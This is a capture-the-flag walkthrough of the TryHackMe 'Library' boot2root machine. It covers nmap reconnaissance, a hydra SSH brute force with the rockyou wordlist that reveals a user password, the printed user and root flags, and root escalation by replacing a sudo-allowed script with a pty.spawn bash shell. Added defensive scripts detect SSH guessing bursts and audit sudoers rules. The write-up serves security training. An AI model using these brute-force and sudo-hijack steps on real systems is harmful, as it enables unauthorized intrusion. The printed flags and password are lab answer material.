boot2root machine for FIT and bsides guatemala CTF
https://tryhackme.com/room/bsidesgtlibrary
Reconnaissance
root@ip-10-10-114-228:~# nmap -sC -sV 10.10.161.234
Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-19 17:49 GMT
Nmap scan report for ip-10-10-161-234.eu-west-1.compute.internal (10.10.161.234)
Host is up (0.0014s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:2f:c3:47:67:06:32:04:ef:92:91:8e:05:87:d5:dc (RSA)
| 256 68:92:13:ec:94:79:dc:bb:77:02:da:99:bf:b6:9d:b0 (ECDSA)
|_ 256 43:e8:24:fc:d8:b8:d3:aa:c2:48:08:97:51:dc:5b:7d (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Blog - Library Machine
MAC Address: 02:DB:43:11:10:4B (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.04 seconds
Two ports are open: 22 (SSH) and 80 (HTTP).
Here is the site's source code.
root@ip-10-10-114-228:~# curl -s http://10.10.161.234
<!doctype html>
<html lang="en">
<head>
<title>Welcome to Blog - Library Machine</title>
<link rel="stylesheet" href="master.css" type="text/css" media="screen" />
</head>
<body>
<header>
<h1>boot2root machine for FIT and bsides Guatemala</h1>
</header>
<nav>
<ul>
<li class="selected"><a href="#">Blog</a></li>
<li><a href="#">About</a></li>
<li><a href="#">Archives</a></li>
<li><a href="#">Contact</a></li>
</ul>
</nav>
<section id="intro">
<header>
<h2>Hack the planet!!!</h2>
</header>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut.</p>
<img src="logo.png" alt="Flower" />
</section>
<div id="content">
<div id="mainContent">
<section>
<article class="blogPost">
<header>
<h2>This is the title of a blog post</h2>
<p>Posted on <time datetime="2009-06-29T23:31+01:00">June 29th 2009</time> by <a href="#">meliodas</a> - <a href="#comments">3 comments</a></p>
</header>
<div>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin euismod tellus eu orci imperdiet nec rutrum lacus blandit. Cras enim nibh, sodales ultricies elementum vel, fermentum id tellus. Proin metus odio, ultricies eu pharetra dictum, laoreet id odio. Curabitur in odio augue. Morbi congue auctor interdum. Phasellus sit amet metus justo. Phasellus vitae tellus orci, at elementum ipsum. In in quam eget diam adipiscing condimentum. Maecenas gravida diam vitae nisi convallis vulputate quis sit amet nibh. Nullam ut velit tortor. Curabitur ut elit id nisl volutpat consectetur ac ac lorem. Quisque non elit et elit lacinia lobortis nec a velit. Sed ac nisl sed enim consequat porttitor.</p>
<img src="logo.png" alt="Flower" />
<p>Pellentesque ut sapien arcu, egestas mollis massa. Fusce lectus leo, fringilla at aliquet sit amet, volutpat non erat. Aenean molestie nibh vitae turpis venenatis vel accumsan nunc tincidunt. Suspendisse id purus vel felis auctor mattis non ac erat. Pellentesque sodales venenatis condimentum. Aliquam sit amet nibh nisi, ut pulvinar est. Sed ullamcorper nisi vel tortor volutpat eleifend. Vestibulum iaculis ullamcorper diam consectetur sagittis. Quisque vitae mauris ut elit semper condimentum varius nec nisl. Nulla tempus porttitor dolor ac eleifend. Proin vitae purus lectus, a hendrerit ipsum. Aliquam mattis lacinia risus in blandit.</p>
<p>Vivamus vitae nulla dolor. Suspendisse eu lacinia justo. Vestibulum a felis ante, non aliquam leo. Aliquam eleifend, est viverra semper luctus, metus purus commodo elit, a elementum nisi lectus vel magna. Praesent faucibus leo sit amet arcu vehicula sed facilisis eros aliquet. Etiam sodales, enim sit amet mollis vestibulum, ipsum sapien accumsan lectus, eget ultricies arcu velit ut diam. Aenean fermentum luctus nulla, eu malesuada urna consequat in. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Pellentesque massa lacus, sodales id facilisis ac, lobortis sed arcu. Donec hendrerit fringilla ligula, ac rutrum nulla bibendum id. Cras sapien ligula, tincidunt eget euismod nec, ultricies eu augue. Nulla vitae velit sollicitudin magna mattis eleifend. Nam enim justo, vulputate vitae pretium ac, rutrum at turpis. Aenean id magna neque. Sed rhoncus aliquet viverra.</p></div>
</article>
</section>
<section id="comments">
<h3>Comments</h3>
<article>
<header>
<a href="#">root</a> on <time datetime="2009-06-29T23:35:20+01:00">June 29th 2009 at 23:35</time>
</header>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut.</p>
</article>
<article>
<header>
<a href="#">www-data</a> on <time datetime="2009-06-29T23:40:09+01:00">June 29th 2009 at 23:40</time>
</header>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut.</p>
</article>
<article>
<header>
<a href="#">Anonymous</a> on <time datetime="2009-06-29T23:59:00+01:00">June 29th 2009 at 23:59</time>
</header>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut.</p>
</article>
</section>
<form action="#" method="post">
<h3>Post a comment</h3>
<p>
<label for="name">Name</label>
<input name="name" id="name" type="text" required />
</p>
<p>
<label for="email">E-mail</label>
<input name="email" id="email" type="email" required />
</p>
<p>
<label for="website">Website</label>
<input name="website" id="website" type="url" />
</p>
<p>
<label for="comment">Comment</label>
<textarea name="comment" id="comment" required></textarea>
</p>
<p><input type="submit" value="Post comment" /></p>
</form>
</div>
</div>
<footer>
<div>
</div>
</footer>
</body>
The page gives us potential usernames: meliodas, root, www-data, Anonymous.
Here is what the robots.txt file returns:
root@ip-10-10-114-228:~# curl -s http://10.10.161.234/robots.txt
User-agent: rockyou
Disallow: /
We will try to find meliodas's password with hydra, using the rockyou wordlist that robots.txt hints at.
root@ip-10-10-114-228:~/Desktop/Tools/wordlists# hydra -l meliodas -P rockyou.txt ssh://10.10.161.234
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2022-12-19 17:57:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.161.234:22/
[22][ssh] host: 10.10.161.234 login: meliodas password: iloveyou1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 10 final worker threads did not complete until end.
[ERROR] 10 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2022-12-19 17:58:17
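From the defender's side, a run like the one above leaves a dense burst of "Failed password" entries in the sshd auth log, followed by one "Accepted password" from the same source. The script below is an added example, not part of the writeup: it parses constructed auth log lines (the IPs reuse the addresses seen on this page, the timestamps and PIDs are made up) and raises one alert per source that reaches a failure threshold inside a time window, marking whether that source later authenticated successfully.

```python
# Added example (not from the writeup): detect SSH password-guessing bursts
# from sshd auth log lines and note when a burst is followed by a success.
import re
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+ ssh2$")
ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted password for (?P<user>\S+) from (?P<src>\S+) port \d+ ssh2$")

# Constructed sample log: a guessing burst from one host that ends in a
# successful login, plus two ordinary typos from another host (no alert).
SAMPLE_LOG = """\
Dec 19 17:57:29 ubuntu sshd[1201]: Failed password for meliodas from 10.10.114.228 port 40212 ssh2
Dec 19 17:57:29 ubuntu sshd[1203]: Failed password for meliodas from 10.10.114.228 port 40214 ssh2
Dec 19 17:57:30 ubuntu sshd[1205]: Failed password for meliodas from 10.10.114.228 port 40216 ssh2
Dec 19 17:57:30 ubuntu sshd[1207]: Failed password for meliodas from 10.10.114.228 port 40218 ssh2
Dec 19 17:57:31 ubuntu sshd[1209]: Failed password for meliodas from 10.10.114.228 port 40220 ssh2
Dec 19 17:57:31 ubuntu sshd[1211]: Failed password for meliodas from 10.10.114.228 port 40222 ssh2
Dec 19 17:58:17 ubuntu sshd[1290]: Accepted password for meliodas from 10.10.114.228 port 40400 ssh2
Dec 19 18:03:02 ubuntu sshd[1301]: Failed password for meliodas from 192.168.15.118 port 50010 ssh2
Dec 19 18:03:10 ubuntu sshd[1302]: Failed password for meliodas from 192.168.15.118 port 50011 ssh2
Dec 19 18:03:20 ubuntu sshd[1303]: Accepted password for meliodas from 192.168.15.118 port 50012 ssh2
"""


def _ts(text, year=2022):
    """syslog timestamps carry no year; the year is an assumption passed in."""
    return datetime.strptime("%d %s" % (year, text), "%Y %b %d %H:%M:%S")


def parse_events(text):
    """Return a list of (time, kind, user, src) for Failed/Accepted password lines."""
    events = []
    for line in text.splitlines():
        m, kind = FAILED_RE.match(line), "failed"
        if not m:
            m, kind = ACCEPTED_RE.match(line), "accepted"
        if m:
            events.append((_ts(m.group("ts")), kind, m.group("user"), m.group("src")))
    return events


def detect_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """One alert per source whose failures within any `window` reach `threshold`.

    'success_after' is True when the same source authenticates at or after
    the end of the burst, which is the case worth paging someone for.
    """
    failures, successes = defaultdict(list), defaultdict(list)
    for t, kind, user, src in sorted(events):
        (failures if kind == "failed" else successes)[src].append((t, user))
    alerts = []
    for src, fl in failures.items():
        times = [t for t, _ in fl]
        for i in range(len(times)):
            j = i
            while j + 1 < len(times) and times[j + 1] - times[i] <= window:
                j += 1
            if j - i + 1 >= threshold:
                last = times[j]
                alerts.append({
                    "src": src,
                    "failures": j - i + 1,
                    "users": sorted({u for _, u in fl[i:j + 1]}),
                    "first": times[i],
                    "last": last,
                    "success_after": any(t >= last for t, _ in successes.get(src, [])),
                })
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_bursts(parse_events(SAMPLE_LOG)):
        print("%(src)s: %(failures)d failures for %(users)s between %(first)s and %(last)s,"
              " later success: %(success_after)s" % alert)
```

The threshold and window are deliberately low here so the constructed sample trips them; on a real host the same logic is usually fed from `journalctl -u ssh` or `/var/log/auth.log`, and the "success after burst" flag is what separates noise from a compromised account.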
Now let's test an SSH connection with the recovered password.
root@ip-10-10-114-228:~# ssh meliodas@10.10.161.234
The authenticity of host '10.10.161.234 (10.10.161.234)' can't be established.
ECDSA key fingerprint is SHA256:sKxkgmnt79RkNN7Tn25FLA0EHcu3yil858DSdzrX4Dc.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.161.234' (ECDSA) to the list of known hosts.
meliodas@10.10.161.234's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Sat Aug 24 14:51:01 2019 from 192.168.15.118
meliodas@ubuntu:~$ ls
bak.py user.txt
meliodas@ubuntu:~$ cat user.txt
6d488cbb3f111d135722c33cb635f4ec
We are logged in and can directly read the user.txt flag.
Now let's look at which commands meliodas may run with elevated privileges.
meliodas@ubuntu:~$ sudo -l
Matching Defaults entries for meliodas on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User meliodas may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
We can run the bak.py script as root with any python* interpreter, without a password.
Here is the bak.py script:
meliodas@ubuntu:~$ cat /home/meliodas/bak.py
#!/usr/bin/env python
import os
import zipfile

def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

if __name__ == '__main__':
    zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()
meliodas@ubuntu:~$
Unfortunately, we cannot edit this script: it belongs to root and we have no write permission on it.
meliodas@ubuntu:~$ ls -la /home/meliodas/bak.py
-rw-r--r-- 1 root root 353 Aug 23 2019 /home/meliodas/bak.py
The file lives in our home directory, which we own. Write permission on the directory, not on the file, is what governs deleting and creating entries in it, so we can remove the root-owned script and recreate one of our own to spawn a root shell.
meliodas@ubuntu:~$ cd /home/meliodas
meliodas@ubuntu:~$ rm -f bak.py
meliodas@ubuntu:~$ nano bak.py
We simply put the following code in the new script:
#!/usr/bin/env python
import pty
pty.spawn("/bin/bash")
Then we run it through sudo and read the root flag.
meliodas@ubuntu:~$ sudo /usr/bin/python3 /home/meliodas/bak.py
root@ubuntu:~# ls
bak.py user.txt
root@ubuntu:~# cat /root/root.txt
e8c8c6c256c35515d1d344ee0488c617
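The sudoers rule on this machine combines two weaknesses: a globbed interpreter path (`/usr/bin/python*`) and a script whose parent directory the sudo user owns. The audit script below is an added example, not part of the writeup or of the machine: it parses a `sudo -l` command line, reports the glob, and checks whether the rule's user can write to the script's directory, using the real Unix rule that directory write permission (not the file's own mode) decides whether an entry can be unlinked and recreated. `run_demo` builds a constructed fixture in a temporary directory (a writable home-like directory and a locked 0555 directory) to show both outcomes; the rule strings and paths in it are made up for the demonstration.

```python
# Added example (not from the writeup): audit sudoers "interpreter + script"
# rules for a globbed command path and for a script that sits in a directory
# the rule's user can write to, which makes the script replaceable even when
# the file itself is root-owned and read-only.
import os
import re
import stat
import tempfile

# Matches one line of 'sudo -l' output such as
#   (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_rule(line):
    """Split one sudo command rule into run-as spec, tags and argv."""
    m = RULE_RE.match(line.strip())
    if not m:
        raise ValueError("unrecognised rule: %r" % line)
    tags = [t.rstrip(":") for t in m.group("tags").split()]
    return {"runas": m.group("runas"), "tags": tags, "argv": m.group("cmd").split()}


def dir_writable_by(path, uid, gids):
    """True when the parent directory of `path` grants write access to uid.

    Standard DAC order: owner bits if uid owns the directory, else group bits
    if one of gids matches, else other bits. unlink() and creat() need write
    on the directory; the file's own mode plays no part.
    """
    st = os.stat(os.path.dirname(os.path.abspath(path)))
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit_rule(line, uid, gids):
    """Return a list of findings for one sudoers command rule."""
    rule = parse_rule(line)
    argv = rule["argv"]
    findings = []
    if any(c in argv[0] for c in "*?["):
        findings.append("glob in command path %s: any matching binary may be run" % argv[0])
    if len(argv) > 1 and os.path.exists(argv[1]) and dir_writable_by(argv[1], uid, gids):
        findings.append("script %s is in a directory the user can write: it can be replaced" % argv[1])
    if "NOPASSWD" in rule["tags"] and findings:
        findings.append("NOPASSWD: no password is required to exercise the above")
    return findings


def replaceable_despite_mode(path):
    """Demonstrate the mechanism: a 0444 file in a writable directory can still
    be unlinked and recreated with new content."""
    os.chmod(path, 0o444)
    try:
        os.unlink(path)
        with open(path, "w") as f:
            f.write("# rewritten by the directory owner\n")
        return True
    except PermissionError:
        return False


def run_demo():
    """Constructed fixture: 'home' is ours and writable, 'opt' is locked (0555)."""
    uid = os.getuid()
    gids = set(os.getgroups()) | {os.getgid()}
    with tempfile.TemporaryDirectory() as tmp:
        home = os.path.join(tmp, "home")
        locked = os.path.join(tmp, "opt")
        for d in (home, locked):
            os.mkdir(d, 0o755)
            with open(os.path.join(d, "bak.py"), "w") as f:
                f.write("import os\n")
        os.chmod(locked, 0o555)
        try:
            weak = audit_rule("(ALL) NOPASSWD: /usr/bin/python* %s/bak.py" % home, uid, gids)
            ok = audit_rule("(ALL) NOPASSWD: /usr/bin/python3 %s/bak.py" % locked, uid, gids)
            replaced = replaceable_despite_mode(os.path.join(home, "bak.py"))
        finally:
            os.chmod(locked, 0o755)  # let TemporaryDirectory clean up
        return {"weak": weak, "ok": ok, "replaced": replaced}


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "->", value)
```

The fix the audit points at is the usual one: keep scripts that sudo runs as root in a root-owned directory such as /usr/local/sbin, name a single fixed interpreter in the rule, and reserve NOPASSWD for commands whose every argument is also fixed.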